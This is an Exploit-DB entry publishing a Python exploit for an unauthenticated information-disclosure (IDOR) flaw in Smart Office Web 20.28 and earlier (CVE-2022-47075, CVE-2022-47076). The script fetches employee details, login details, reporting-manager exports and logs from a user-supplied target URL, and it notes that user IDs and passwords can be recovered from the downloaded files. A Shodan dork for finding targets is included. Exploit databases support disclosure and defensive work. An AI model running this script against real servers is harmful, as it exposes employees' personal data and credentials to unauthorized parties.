Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)

EDB-ID:

51539

CVE:

2022-47076 2022-47075

EDB Verified:

Author:

Tejas Pingulkar

Type:

webapps

Exploit:   /  

Platform:

ASPX

Date:

2023-06-22

Vulnerable App: 
# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
# Date: 09/Dec/2022
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://smartofficepayroll.com/
# Software Link: https://smartofficepayroll.com/downloads
# Version: Smart Office Web 20.28 and before
# CVE Number : CVE-2022-47075 and CVE-2022-47076
# CVSS : 7.5 (High)
# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
# Vulnerability Description:
# Smart Office Web 20.28  and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.

import wget
import os
from colorama import Fore, Style

def download_file(url, filename):
    wget.download(url, filename)

# Disclaimer
print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.")

agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
if agree != "1":
    print("You have chosen not to agree. Exiting the script.")
    exit()

# Print name in red
name = "Exploit by Tejas Nitin Pingulkar"
print(Fore.RED + name)
print(Style.RESET_ALL)  # Reset color

website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
folder_name = input("Enter the folder name to save the files: ")

# Create the folder if it doesn't exist
if not os.path.exists(folder_name):
    os.makedirs(folder_name)

urls_filenames = []

if target_version == "1":
    urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
else:
    urls_filenames.extend([
        (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
        (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
        (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
        (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
    ])

print("CVE-2022-47076: Obtain user ID and password from downloaded source")

for url, filename in urls_filenames:
    download_file(url, os.path.join(folder_name, filename))

# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
print(Style.RESET_ALL)  # Reset color
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services